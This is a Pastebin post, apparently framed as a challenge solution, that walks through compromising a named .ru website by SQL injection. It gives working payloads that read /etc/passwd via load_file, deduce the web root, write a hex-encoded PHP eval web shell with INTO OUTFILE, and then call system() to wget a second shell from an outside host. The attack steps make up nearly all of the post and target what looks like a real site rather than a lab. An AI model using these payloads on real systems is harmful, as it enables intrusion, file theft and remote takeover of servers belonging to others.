Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- So .. what's the first file you check when you see that user is root?
- /etc/passwd. -- The answer is always /etc/passwd. :v
- http://www.agiperwatch.ru/new.php?id=.' uNiOn SeLeCt 1,cOncat('<pre>',load_file('/etc/passwd'),'</pre>'),3,4,5,6-- --
- Most of the people who tried the challenge found /var/www/agiperwatch/data and thought this is the full path and when they failed they stopped .. but if you tried reading the /etc/passwd carefully you would've noticed there's another path containing "agiperwatch"
- virtuser_526:x:526:502::/var/www/agiperwatch/data/email/agiperwatch.ru/sale:/usr/sbin/nologin
- /var/www/agiperwatch/data/email/agiperwatch.ru/sale .. that wasn't the right path too :v but
- look at that folder after /data/ .. "/email/" - I assume it's for mail/smtp purposes .. if we change that to "www" as in "/var/www" we have our full path ..
- /var/www/agiperwatch/data/www/agiperwatch.ru/ -- # You get errcode 13 if you try writing in this folder, it means permissión denied
- so we just have to change /sale to /temp *writeable folder* and upload our shell .. the error-based part was easy .. the goal was to find the right path..
- http://www.agiperwatch.ru/new.php?id=40' limit 1 into outfile '/var/www/agiperwatch/data/www/agiperwatch.ru/temp/xyz.php' lines terminated by 0x3c3f70687020406576616c28245f524551554553545b27616e306e275d29203f3e -- --
- http://www.agiperwatch.ru/temp/xyz.php?an0n=system('wget http://site.com/shell.txt -O shell.php');
- and there you have it..
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement